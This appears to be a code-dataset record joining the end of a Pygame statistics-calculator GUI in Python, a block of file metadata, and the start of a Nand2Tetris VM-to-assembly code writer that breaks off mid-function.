or self.active_menu == 'average_input_4'):
self.active_button = ''
self.active_menu = 'average_menu'
# Median menu.
elif self.active_menu == 'median_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'median_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'median_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'median_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'median_input_4'
# Median input menus.
elif (self.active_menu == 'median_input_1'
or self.active_menu == 'median_input_2'
or self.active_menu == 'median_input_3'
or self.active_menu == 'median_input_4'):
self.active_button = ''
self.active_menu = 'median_menu'
# Mode menu.
elif self.active_menu == 'mode_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'mode_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'mode_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'mode_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'mode_input_4'
# Mode input menus.
elif (self.active_menu == 'mode_input_1'
or self.active_menu == 'mode_input_2'
or self.active_menu == 'mode_input_3'
or self.active_menu == 'mode_input_4'):
self.active_button = ''
self.active_menu = 'mode_menu'
# Range menu.
elif self.active_menu == 'range_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'range_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'range_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'range_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'range_input_4'
# Range input menus.
elif (self.active_menu == 'range_input_1'
or self.active_menu == 'range_input_2'
or self.active_menu == 'range_input_3'
or self.active_menu == 'range_input_4'):
self.active_button = ''
self.active_menu = 'range_menu'
def data_processing_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the data processing menu."""
# Main data processing menu.
if self.active_menu == 'data_processing_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.average_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'average_menu'
self.input_buttons = 4
elif self.median_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'median_menu'
self.input_buttons = 4
elif self.mode_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'mode_menu'
self.input_buttons = 4
elif self.range_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'range_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Average menu.
elif self.active_menu == 'average_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.average_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Median menu.
elif self.active_menu == 'median_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.median_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Mode menu.
elif self.active_menu == 'mode_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.mode_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Range menu.
elif self.active_menu == 'range_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('data_processing_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.range_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# GUI section.
def create_all_gui(self):
"""Quick call all of the button creation functions."""
self.active_button_color = (150,150,160)
self.idle_button_color = (210,210,220)
self.border_color = (60,60,70)
self.text_color = (0,0,0)
self.width = self.screen_rect.width * 0.25
self.height = self.screen_rect.height * 0.05
self.x_gap = self.width * 0.2
self.border_size = 0.18
if self.screen_rect.width / self.screen_rect.height >= 1.4:
self.text_size = 1.2
elif self.screen_rect.width / self.screen_rect.height >= 1:
self.text_size = 0.9
elif self.screen_rect.width / self.screen_rect.height >= 0.8:
self.text_size = 0.75
else:
self.text_size = 0.5
self.answer_text_move_amount = self.screen_rect.width*0.1
self.tiles = []
column, row = 0, 0
gap = int(self.screen_rect.width*0.001)
if gap < 1:
gap = 1
diagonal = ((self.screen_rect.width**2 + self.screen_rect.height**2)
**(1/2))
size = int(diagonal/18) - gap
x_amount = int((self.screen_rect.width/size) + 1)
y_amount = int((self.screen_rect.height/size) + 1)
amount = x_amount * y_amount
for tile in range(amount):
if column == x_amount:
column = 0
row += 1
tile = StaticButton(self,
width=size,
height=size,
button_color=(230,230,230),
align='topleft',
align_obj=self.screen_rect.topleft,
add_x=int(gap + (size + gap) * column),
add_y=int(gap + (size + gap) * row))
self.tiles.append(tile)
column += 1
self.back_button = DynamicTextButton(self,
width=self.width/2,
height=self.height,
border_size=self.border_size/2,
text_size=self.text_size,
align='topleft',
align_obj=self.screen_rect.topleft)
self.calculate_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*1.5,
border_size=self.border_size*0.75,
height=self.height*1.25,
multiply_y=1.68)
self.answer_button = DynamicTextButton(self,
text_size=self.text_size/1.5,
width=self.screen_rect.width,
border_size=self.border_size,
height=self.height*1.25,
multiply_y=1.92)
self.hover_text_help = DynamicTextButton(self,
width=self.width*3,
height=self.height*1.1,
border_size=0.17,
text_size=self.text_size,
multiply_y=0.175)
self.input_button_1 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.4)
self.input_button_2 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.6)
self.input_button_3 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=0.8)
self.input_button_4 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height)
self.input_button_5 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.2)
self.input_button_6 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.4)
self.input_button_7 = DynamicTextButton(self,
text_size=self.text_size,
width=self.width*0.62,
border_size=self.border_size,
height=self.height,
multiply_x=1.6)
self.create_main_menu_gui()
self.create_converters_menu_gui()
self.create_factors_menu_gui()
self.create_geometry_menu_gui()
self.create_algebra_menu_gui()
self.create_data_processing_menu_gui()
# Main menu.
def create_main_menu_gui(self):
"""Create the buttons for the main menu."""
self.converters_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.6)
self.factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.8)
self.geometry_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height)
self.data_processing_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.2)
self.algebra_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.4)
def draw_main_menu_gui(self):
"""Draw the main menu."""
if self.active_button != 'factors_button':
self.factors_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factors")
elif self.active_button == 'factors_button':
self.factors_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factors")
if self.active_button != 'converters_button':
self.converters_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Converters")
elif self.active_button == 'converters_button':
self.converters_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Converters")
if self.active_button != 'geometry_button':
self.geometry_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Geometry")
elif self.active_button == 'geometry_button':
self.geometry_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Geometry")
if self.active_button != 'algebra_button':
self.algebra_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Algebra")
elif self.active_button == 'algebra_button':
self.algebra_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Algebra")
if self.active_button != 'data_processing_button':
self.data_processing_button.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Data Processing")
elif self.active_button == 'data_processing_button':
self.data_processing_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Data Processing")
# Converters menu.
def create_converters_menu_gui(self):
"""Create the buttons for the converters menu."""
self.temp_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height)
def draw_converters_menu_gui(self):
"""Draw the converters menu."""
if self.active_button != 'temp_button':
self.temp_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Temperature")
elif self.active_button == 'temp_button':
self.temp_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Temperature")
# Factors menu.
def create_factors_menu_gui(self):
"""Create the buttons for the factors menu."""
self.get_factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.7)
self.common_factors_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.gcf_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
self.lcf_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.3)
def draw_factors_menu_gui(self):
"""Draw the factors menu."""
if self.active_button != 'get_factors_button':
self.get_factors_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factoring")
elif self.active_button == 'get_factors_button':
self.get_factors_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Factoring")
if self.active_button != 'common_factors_button':
self.common_factors_button.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Common Factors")
elif self.active_button == 'common_factors_button':
self.common_factors_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Common Factors")
if self.active_button != 'gcf_button':
self.gcf_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="GCF")
elif self.active_button == 'gcf_button':
self.gcf_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="GCF")
if self.active_button != 'lcf_button':
self.lcf_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="LCF")
elif self.active_button == 'lcf_button':
self.lcf_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="LCF")
# Geometry menu.
def create_geometry_menu_gui(self):
"""Create the buttons for the geometry menu."""
self.mar_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.solid_polygon_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
def draw_geometry_menu_gui(self):
"""Draw the geometry menu."""
if self.active_button != 'mar_button':
self.mar_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Maintain Ratio")
elif self.active_button == 'mar_button':
self.mar_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Maintain Ratio")
if self.active_button != 'solid_polygon_button':
self.solid_polygon_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="2D Solid Info")
elif self.active_button == 'solid_polygon_button':
self.solid_polygon_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="2D Solid Info")
# Algebra menu.
def create_algebra_menu_gui(self):
"""Create the buttons for the algebra menu."""
self.root_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.extrapolate_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
def draw_algebra_menu_gui(self):
"""Draw the algebra menu."""
if self.active_button != 'root_button':
self.root_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Root")
elif self.active_button == 'root_button':
self.root_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Root")
if self.active_button != 'extrapolate_button':
self.extrapolate_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Extrapolate")
elif self.active_button == 'extrapolate_button':
self.extrapolate_button.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Extrapolate")
# Data processing menu.
def create_data_processing_menu_gui(self):
"""Create the buttons for the data processing menu."""
self.average_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.7)
self.median_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=0.9)
self.mode_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.1)
self.range_button = DynamicTextButton(self,
text_size=self.text_size,
width=self.width,
border_size=self.border_size,
height=self.height,
multiply_y=1.3)
def draw_data_processing_menu_gui(self):
"""Draw the data processing menu."""
if self.active_button != 'average_button':
self.average_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mean/Average")
elif self.active_button == 'average_button':
self.average_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mean/Average")
if self.active_button != 'median_button':
self.median_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Median")
elif self.active_button == 'median_button':
self.median_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Median")
if self.active_button != 'mode_button':
self.mode_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mode")
elif self.active_button == 'mode_button':
self.mode_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Mode")
if self.active_button != 'range_button':
self.range_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Range")
elif self.active_button == 'range_button':
self.range_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Range")
# Redraw all screen elements.
def update_screen(self):
"""Update the screen."""
self.screen.fill((60,60,60))
for tile in self.tiles:
tile.draw()
if self.active_menu != 'main_menu':
if self.active_button != 'back_button':
self.back_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Back")
elif self.active_button == 'back_button':
self.back_button.draw(button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text="Back")
if (self.active_menu != 'factors_menu'
and self.active_menu != 'converters_menu'
and self.active_menu != 'geometry_menu'
and self.active_menu != 'algebra_menu'
and self.active_menu != 'data_processing_menu'):
if self.active_button != 'calculate_button':
self.calculate_button.draw(button_color=(30,220,30),
border_color=self.border_color,
text_color=self.text_color,
text="Calculate [ENTER]")
elif self.active_button == 'calculate_button':
self.calculate_button.draw(button_color=(20,140,20),
border_color=self.border_color,
text_color=self.text_color,
text="Calculate [ENTER]")
self.answer_button.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.answer,
text_x_add=self.answer_text_x_mod)
self.hover_text_help.draw(button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.hover_text)
if self.input_buttons == 1:
if self.active_button != 'input_button_4':
self.input_button_4.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.active_button == 'input_button_4':
self.input_button_4.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.input_buttons == 2:
if self.active_button != 'input_button_3':
self.input_button_3.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
elif self.active_button == 'input_button_3':
self.input_button_3.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
if self.active_button != 'input_button_5':
self.input_button_5.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.active_button == 'input_button_5':
self.input_button_5.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.input_buttons == 3:
if self.active_button != 'input_button_2':
self.input_button_2.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_2)
elif self.active_button == 'input_button_2':
self.input_button_2.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_2)
if self.active_button != 'input_button_4':
self.input_button_4.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
elif self.active_button == 'input_button_4':
self.input_button_4.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_4)
if self.active_button != 'input_button_6':
self.input_button_6.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_6)
elif self.active_button == 'input_button_6':
self.input_button_6.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_6)
elif self.input_buttons == 4:
if self.active_button != 'input_button_1':
self.input_button_1.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_1)
elif self.active_button == 'input_button_1':
self.input_button_1.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_1)
if self.active_button != 'input_button_3':
self.input_button_3.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
elif self.active_button == 'input_button_3':
self.input_button_3.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_3)
if self.active_button != 'input_button_5':
self.input_button_5.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
elif self.active_button == 'input_button_5':
self.input_button_5.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_5)
if self.active_button != 'input_button_7':
self.input_button_7.draw(
button_color=self.active_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_7)
elif self.active_button == 'input_button_7':
self.input_button_7.draw(
button_color=self.idle_button_color,
border_color=self.border_color,
text_color=self.text_color,
text=self.input_box_7)
if self.active_menu == 'main_menu':
self.draw_main_menu_gui()
elif self.active_menu == 'converters_menu':
self.draw_converters_menu_gui()
elif self.active_menu == 'factors_menu':
self.draw_factors_menu_gui()
elif self.active_menu == 'geometry_menu':
self.draw_geometry_menu_gui()
elif self.active_menu == 'algebra_menu':
self.draw_algebra_menu_gui()
elif self.active_menu == 'data_processing_menu':
self.draw_data_processing_menu_gui()
pygame.display.flip()
if __name__ == '__main__':
# Make a calculator instance, and then run it.
main = MathStuffGUI()
main.run_program()
| 46.364138
| 177
| 0.522208
| 13,867
| 125,925
| 4.405279
| 0.020697
| 0.119778
| 0.101362
| 0.070227
| 0.933162
| 0.911701
| 0.882203
| 0.864311
| 0.835631
| 0.823304
| 0
| 0.018251
| 0.38866
| 125,925
| 2,715
| 178
| 46.381215
| 0.775275
| 0.023951
| 0
| 0.76752
| 0
| 0.000839
| 0.066874
| 0.006033
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015107
| false
| 0.000839
| 0.001679
| 0
| 0.018884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6324cb2187a53dcb5243d8f01f07a5ca3641c6b3
| 12,140
|
py
|
Python
|
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
projects/07/code_writer.py
|
Youngermaster/Nand2Tetris-Solutions
|
9fb4ac31a0558bcc2324696bfb451aac11232088
|
[
"MIT"
] | null | null | null |
from parser import Parser
class CodeWriter:
def __init__(self, path):
self.parser = Parser(path)
# just perform the logic of the recommended setFileName constructor here
ind1 = path.find('/')
ind2 = path.find('.')
self.writefile = path[:ind1] + "/" + path[ind1+1:ind2]
self.filename = self.writefile + '.asm'
self.file = open(self.filename, 'w')
self.writefile_ind = self.writefile.rfind('/')
# * Useful in declaring static variables
self.static_var = self.writefile[self.writefile_ind + 1:]
def writePushPop(self): # no need to pass in command as an argument
assert self.parser.commandType() in ['C_PUSH', 'C_POP']
arg1 = self.parser.arg1()
arg2 = self.parser.arg2()
if self.parser.commandType() == 'C_PUSH':
# stack operation
if arg1 == 'constant':
# e.g. push constant 7
self.file.write('@%s\n' % arg2)
self.file.write('D=A\n') # D = 7
self.file.write('@SP\n')
self.file.write('A=M\n')
self.file.write('M=D\n') # M[M[base_address]] = 7
elif arg1 in ['temp', 'pointer', 'local', 'argument', 'this', 'that']:
self.file.write('@%s\n' % arg2)
self.file.write('D=A\n')
if arg1 == 'temp':
self.file.write('@5\n')
self.file.write('A=D+A\n')
elif arg1 == 'pointer':
self.file.write('@3\n')
self.file.write('A=D+A\n')
elif arg1 == 'local':
self.file.write('@LCL\n')
self.file.write('A=D+M\n')
elif arg1 == 'argument':
self.file.write('@ARG\n')
self.file.write('A=D+M\n')
elif arg1 == 'this':
self.file.write('@THIS\n')
self.file.write('A=D+M\n')
elif arg1 == 'that':
self.file.write('@THAT\n')
self.file.write('A=D+M\n')
else:
pass
self.file.write('D=M\n')
self.file.write('@SP\n')
self.file.write('A=M\n')
self.file.write('M=D\n')
elif arg1 == 'static':
# declare a new symbol file.j in "push static j"
self.file.write('@%s.%s\n' % (self.static_var, arg2))
self.file.write('D=M\n')
# push D's value to the stack
self.file.write('@SP\n')
self.file.write('A=M\n')
self.file.write('M=D\n')
else:
# TODO
pass
# increase address of stack top
self.file.write('@SP\n')
self.file.write('M=M+1\n') # M[base_address] = M[base_address] + 1
elif self.parser.commandType() == 'C_POP':
# pop the stack value and store it in segment[index]
# use general purpose RAM[13] to store the value of 'segment_base_address + index'
self.file.write('@%s\n' % arg2)
self.file.write('D=A\n')
if arg1 in ['temp', 'pointer', 'local', 'argument', 'this', 'that']:
if arg1 == 'local':
self.file.write('@LCL\n')
self.file.write('D=D+M\n')
elif arg1 == 'argument':
self.file.write('@ARG\n')
self.file.write('D=D+M\n')
elif arg1 == 'this':
self.file.write('@THIS\n')
self.file.write('D=D+M\n')
elif arg1 == 'that':
self.file.write('@THAT\n')
self.file.write('D=D+M\n')
elif arg1 == 'temp':
self.file.write('@5\n')
self.file.write('D=D+A\n')
elif arg1 == 'pointer':
self.file.write('@3\n')
self.file.write('D=D+A\n')
else:
# TODO
pass
# self.file.write('D=D+M\n')
self.file.write('@13\n') # general purpose register
self.file.write('M=D\n')
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n') # pop command
self.file.write('@13\n')
self.file.write('A=M\n')
self.file.write('M=D\n') # write to appropriate address
self.file.write('@SP\n')
self.file.write('M=M-1\n') # adjust address of stack top
elif arg1 == 'static':
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n') # pop command
self.file.write('@%s.%s\n' % (self.static_var, arg2))
self.file.write('M=D\n') # write to appropriate address
self.file.write('@SP\n')
self.file.write('M=M-1\n') # adjust address of stack top
else:
# TODO
pass
def writeArithmetic(self): # no need to pass in command as an argument
assert self.parser.commandType() == 'C_ARITHMETIC'
command = self.parser.arg1()
if command == 'add':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('D=D+M\n')
self.file.write('M=D\n')
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'sub':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('D=M-D\n')
self.file.write('M=D\n')
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'eq':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('D=M-D\n')
# there could be more than one 'eq' command
self.file.write('@IF_TRUE_%s\n' % self.parser.i)
self.file.write('D;JEQ\n')
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=0\n')
# there could be more than one 'eq' command
self.file.write('@END_%s\n' % self.parser.i)
self.file.write('0;JMP\n')
self.file.write('(IF_TRUE_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=-1\n')
self.file.write('(END_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'gt':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('D=M-D\n')
# there could be more than one 'gt' command
self.file.write('@IF_TRUE_%s\n' % self.parser.i)
self.file.write('D;JGT\n')
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=0\n')
# there could be more than one 'gt' command
self.file.write('@END_%s\n' % self.parser.i)
self.file.write('0;JMP\n')
self.file.write('(IF_TRUE_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=-1\n')
self.file.write('(END_%s)\n' % self.parser.i)
self.file.write('@SP\n')
self.file.write('M=M-1\n')
elif command == 'lt':
# stack operation
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('D=M\n')
self.file.write('A=A-1\n')
self.file.write('D=M-D\n')
# there could be more than one 'lt' command
self.file.write('@IF_TRUE_%s\n' % self.parser.i)
self.file.write('D;JLT\n')
self.file.write('@SP\n')
self.file.write('A=M-1\n')
self.file.write('A=A-1\n')
self.file.write('M=0\n')
# there could be more than one 'lt' command
self.file.write('@END_%s\n' % self.parser.i)
self.file.write('0;JMP\n')
